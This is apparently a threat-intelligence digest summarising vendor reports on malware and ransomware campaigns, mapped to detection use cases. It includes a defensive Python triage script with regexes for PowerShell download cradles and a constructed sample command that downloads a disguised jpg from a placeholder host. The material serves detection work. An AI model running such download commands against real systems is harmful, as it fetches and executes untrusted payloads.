Colibri Loader

April 12, 2022

Malwarebytes provided analysis on Colibri Loader, a malware that emerged in underground forums in August 2021. The malware is advertised to “people who have large volumes of traffic and lack of time to work out the material.”

RedLine Stealer Spreading from Illegitimate Windows 11 Upgrade

February 15, 2022

Industry: N/A | Level: Tactical | Source: HP – ThreatResearch

Threat Research from HP has identified the distribution of the information-stealing malware RedLine Stealer posing as an installer for Microsoft’s latest OS version, Windows 11. The campaign is recent: one of the malicious domains, windows-upgraded[.]com, was registered on January 27th, 2022. The fraudulent Microsoft page offers a download link for a malicious zip file, “Windows11InstallationAssistant.zip”. The zip file is hosted on Discord and contains “six Windows DLLs, an XML file and a portable executable.” When the malicious executable is run, an encoded PowerShell command executes and, after a 21-second timeout, downloads a jpg file. The jpg file is actually a disguised DLL. Once the DLL is loaded, the RedLine Stealer payload is active and proceeds with data collection and exfiltration as directed by the attacker.

  • Anvilogic Scenario: InfoStealer Malware Behaviors
  • Anvilogic Use Cases:
    • Encoded Powershell Command
    • Query Registry

Phosphorus/APT35 New PowerLess Trojan

February 08, 2022

Industry: N/A | Level: Tactical | Source: Cybereason

Research from Cybereason has identified the Iranian group Phosphorus/APT35/Charming Kitten using a new PowerShell tool, “PowerLess Backdoor,” while also exploiting the Log4Shell vulnerability. The new malware can download additional payloads for information stealing; what makes it unique is a new stealth technique, as detailed in the report, “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic does not prevent PowerShell events from being logged. The only instance in which a PowerShell process is spawned is when a process needs to be killed. Based on the IOCs reviewed by Cybereason, the infrastructure used for the attack is highly active, with one observed IP address overlapping with Memento Ransomware, suggesting a potential connection between the threat actor group and the ransomware.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell

Midas Ransomware

February 01, 2022

Industry: Technology | Level: Tactical | Source: Sophos

Sophos reported a deployment of Midas ransomware against a technology vendor in December 2021. A review of the threat indicators showed the attackers were active on the network for at least two months, with the earliest indicator of compromise found on October 13th, 2021. The organization’s network was, unfortunately, flat, with no network segmentation. The attackers also took advantage of the commercial remote access tools AnyDesk and TeamViewer to move laterally, as the organization had previously used the software for tests but had not uninstalled it from the servers. A unique aspect of the compromise identified by Sophos is that the attackers crafted and installed PowerShell scripts as services prior to deploying the ransomware; this activity was carefully engineered during the two months they were on the network. Due to a visibility gap, it is unknown how the attackers accessed the domain controller or obtained Admin permissions. Threat activity progressed slowly from October 13th to November 2nd, picked up again on November 25th, and culminated in ransomware deployment on December 7th. Observed threat activity on the network included using Process Hacker to identify processes, Mimikatz for credential harvesting, execution of scripts from TEMP and AppData directories, and exfiltration of data to a cloud service.

  • Anvilogic Use Cases:
    • Windows Service Created
    • Obfuscated Powershell Techniques
    • RDP Hijacking
    • Mimikatz
    • Executable Process from Suspicious Folder
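As an added defender-side example (not code from HP, Sophos or Anvilogic), the following Python covers two behaviours described above: it decodes the base64 `-EncodedCommand` blob from a process-creation record and checks the decoded script for a download cradle and a non-executable extension, as in the RedLine chain, and it flags a PowerShell image path on a service-install record, as in the Midas case where PowerShell scripts were installed as services. The event dictionary shapes and all sample values are constructed assumptions, not real telemetry.

```python
import base64
import re

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc, ...)
ENC_RE = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-cradle indicators looked for in the decoded script text
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer|\biwr\b", re.IGNORECASE)
# Non-executable extensions that may disguise a fetched DLL or EXE (the jpg-that-is-a-DLL trick)
DISGUISE_RE = re.compile(r"\.(?:jpg|jpeg|png|gif|txt)\b", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(event):
    """Return the list of detection reasons for one event dict (empty list means clean)."""
    reasons = []
    if event.get("type") == "process_create":
        script = decode_encoded_command(event.get("cmdline", ""))
        if script is not None:
            reasons.append("encoded_powershell")
            if CRADLE_RE.search(script):
                reasons.append("download_cradle")
            if DISGUISE_RE.search(script):
                reasons.append("non_executable_extension_fetched")
    elif event.get("type") == "service_install":  # a 7045-style service-installed record
        image = event.get("image_path", "")
        if re.search(r"powershell(?:\.exe)?|pwsh", image, re.IGNORECASE):
            reasons.append("powershell_service")
            if ENC_RE.search(image):
                reasons.append("encoded_powershell")
    return reasons

# Constructed sample events, not real telemetry; the blob is built from a readable script here.
SAMPLE_SCRIPT = "Start-Sleep 21; (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.jpg', 'C:\\Windows\\Temp\\a.jpg')"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"type": "process_create", "cmdline": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENC},
    {"type": "process_create", "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"type": "service_install", "image_path": "powershell.exe -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\svc.ps1"},
    {"type": "service_install", "image_path": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]
```

Run `triage_event` over each entry of `SAMPLE_EVENTS`: only the encoded download cradle and the PowerShell-backed service produce reasons, the plain script run and the svchost service do not.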

BlueNoroff Cryptocurrency Focused APT Group

January 18, 2022

Industry: Finance & Technology | Level: Operational | Source: Securelist

Kaspersky shared research on BlueNoroff, an APT group it tracks that appears to be associated with Lazarus. Kaspersky began tracking the group after its 2016 attack on Bangladesh’s Central Bank. The group’s attack proficiency is most specialized in “the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own user, or other means.” The group’s activities this year appear to have focused on cryptocurrency startups. As an initial lure, the group communicates through services such as Google Drive or LinkedIn messages, delivering malicious documents either directly or in a compressed file that also contains an LNK file. Executing the malicious document launches PowerShell and/or a VBScript that conducts basic fingerprinting of the system before the threat actor proceeds with additional objectives such as collecting credentials or setting/stealing cryptocurrency. The group operates patiently, studying the environment and blending in its activities.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Suspicious File written to Disk
    • Windows Copy Files

Malicious Microsoft Exchange IIS Module Owowa

December 21, 2021

Industry: Government & Transportation | Level: Tactical | Source: SecureList

Kaspersky shared intelligence on a malicious implant, dubbed “Owowa,” targeting the Outlook Web Access (OWA) application of Exchange servers. The implant is capable of enabling remote command execution and capturing the credentials of users who successfully authenticate through OWA. Owowa was discovered in late 2020 from sample submissions to VirusTotal and from tracking with Kaspersky’s telemetry data. Since April 2021 the malware appears to have circulated through parts of Europe, Malaysia, Mongolia, Indonesia, and the Philippines. The malicious add-in module uses the name “ExtenderControlDesigner” and is loaded through a PowerShell script.

  • Anvilogic Use Case: IIS Worker (W3WP) Spawn Command Line

ALPHV/BlackCat ransomware – Technical Information from Symantec

December 21, 2021

Industry: N/A | Level: Operational | Source: Symantec

Symantec examined the emerging ALPHV/BlackCat ransomware, which is written in the Rust programming language. In one observed attack chain, suspicious activity was identified on a victim network on November 3rd, 2021, leading to the ransomware’s deployment on November 18th. Initial activity on November 3rd started with suspicious SMB requests followed by a registry dump of the Local Security Authority (LSA). Shortly after, PsExec was executed, launching a command prompt that disabled ‘RestrictedAdmin mode’ in the registry. The activity went silent until November 18th, when PsExec disabled Windows Defender with PowerShell and added “*.exe” to an AV exclusion list. The ransomware was then deployed using PsExec. Symantec’s review of the samples found the attack was specifically targeted at the victim organization, as the “victim’s administrative credentials are embedded as part of the configuration block”.

  • Anvilogic Scenario: Initial ALPHV/BlackCat Ransomware – Behaviors
  • Anvilogic Use Cases:
    • ProcDump Credential Harvest
    • Task Manager lsass Dump
    • Remote Admin Tools
    • Registry key added with reg.exe

Yanluowang Ransomware Linked to Thieflock Affiliate

December 01, 2021

Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec

The Yanluowang ransomware group, active since at least August 2021, has been targeting US corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been using TTPs similar to those of Thieflock ransomware attacks. Based on Symantec’s observations, there appears to be a link, or a shifting of allegiances, from Thieflock to the Yanluowang ransomware family. Notable TTP patterns observed include the use of BazarLoader for initial access, PowerShell to download tools that enable RDP in the registry, Adfind for reconnaissance, and various other credential-stealing tools.

  • Anvilogic Scenario: Yanluowang Ransomware – Behaviors
  • Anvilogic Use Cases:
    • RDP Enabled
    • Adfind Execution
    • pypykatz commands

Cuba Ransomware

December 01, 2021

Industry: Critical Infrastructure | Level: Tactical | Source: FBI

The FBI released a flash report on Cuba ransomware, which, based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to Cuba ransomware. Threat actors use phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. The threat actors also employ many legitimate Windows services and tools, such as PowerShell and PsExec, and leverage Windows Admin privileges to execute their ransomware.

  • Anvilogic Scenario: Hancitor & Cuba Ransomware
  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • PSexec Service Creation
    • Remote Admin Tools

APT37 and Chinotto Malware

November 24, 2021

Industry: Media & Nonprofit | Level: Tactical | Source: SecureList

Kaspersky has identified the North Korean nation-state sponsored group APT37/ScarCruft/Temp.Reaper targeting South Korean journalists, defectors, and human rights activists. The group used the Chinotto malware, distributed through watering holes, spear-phishing emails, and smishing attacks. A news organization had data stolen, and evidence showed the attackers had access to its environment for several months. Versions of the malware were observed for PowerShell, Windows, and Android, with similar HTTP-based command and control schemes. Additional observed capabilities include modifying registry keys (specifically enabling trust access for VBA), registering a PowerShell command in the Run registry key for persistence that executes an HTA file with mshta, and collecting files staged in a folder.

  • Anvilogic Scenario: APT37 & “Chinotto” Malware
  • Anvilogic Use Cases:
    • Query Registry
    • New AutoRun Registry Key
    • MSHTA.exe execution
    • Data Staged to File